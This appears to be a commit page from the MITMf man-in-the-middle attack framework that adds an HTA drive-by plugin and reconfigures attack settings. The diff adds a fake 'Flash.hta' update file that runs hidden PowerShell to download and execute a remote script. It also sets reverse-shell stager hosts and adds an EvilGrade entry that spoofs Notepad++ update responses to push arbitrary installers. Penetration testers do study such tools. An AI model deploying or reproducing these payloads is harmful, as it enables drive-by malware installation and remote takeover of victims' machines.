This is a vewwwy big commit

- The inject plugin now uses beautifulsoup4 to actually parse HTML and add content to it as supposed to using regexes - The logging of the whole framework has been compleatly overhauled - plugindetect.js now includes os.js from the metasploit framework for os and browser detection, let's us fingerprint hosts even if UA is lying! - New plugin HTA Drive-by has been added, prompts the user for a plugin update and makes them download an hta app which contains a powershell payload - the API of the plugins has been simplified - Improvements and error handling to user-agent parsing - Some misc bugfixes
2025-08-20 05:23:28 -07:00 · 2015-07-18 20:14:07 +02:00 · 2015-07-18 20:14:07 +02:00 · 5e2f30fb89
commit 5e2f30fb89
parent ff0ada2a39
64 changed files with 3748 additions and 1473 deletions
--- a/config/hta_driveby/Flash.hta
+++ b/config/hta_driveby/Flash.hta
@ -0,0 +1,4 @@
+<script>
+var c = "powershell.exe -w hidden -nop -ep bypass -c \"\"IEX ((new-object net.webclient).downloadstring('http://0.0.0.0:3000/ps/ps.png')); Invoke-ps\"\"";
+new ActiveXObject('WScript.Shell').Run(c);
+</script>
--- a/config/mitmf.conf
+++ b/config/mitmf.conf
@ -25,7 +25,7 @@
 		#

 		port = 445
-		type = normal  # Can be set to Normal or Karma
+		mode = normal  # Can be set to Normal or Karma

 		# Set a custom challenge
 		Challenge = 1122334455667788
@ -57,14 +57,13 @@
 			# ini = /tmp/desktop.ini
 			# bat = /tmp/evil.bat

-	#This is still experimental, don't uncomment pls!
-	#[[HTTP]]
+	[[HTTP]]
 		
 		#
 		# Here you can configure MITMf's internal HTTP server
 		#

-		#port = 80
+		port = 80

 		#[[[Paths]]]

@ -477,7 +476,7 @@
 					# PATCH_METHOD overwrites PATCH_TYPE with jump
 					# PATCH_METHOD = automatic
 					PATCH_METHOD =
-					HOST = 192.168.1.16
+					HOST = 192.168.10.11
 					PORT = 8443
 					SHELL = iat_reverse_tcp_stager_threaded
 					SUPPLIED_SHELLCODE = None
@ -511,3 +510,10 @@
 					PORT = 5555
 					SUPPLIED_SHELLCODE = None
 					MSFPAYLOAD = linux/x64/shell_reverse_tcp
+
+[EvilGrade]
+
+	[[NotePad++]]
+		host = 'notepad-plus-plus.org'
+		url = '/update/getDownloadUrl.php?version='
+		data  = r'<GUP><NeedToBeUpdated>yes</NeedToBeUpdated><Version>%RAND%</Version><Location>http://notepad-plus-plus.org/repository/%RAND%/%RAND%/npp.%RAND%.Installer.exe</Location></GUP>'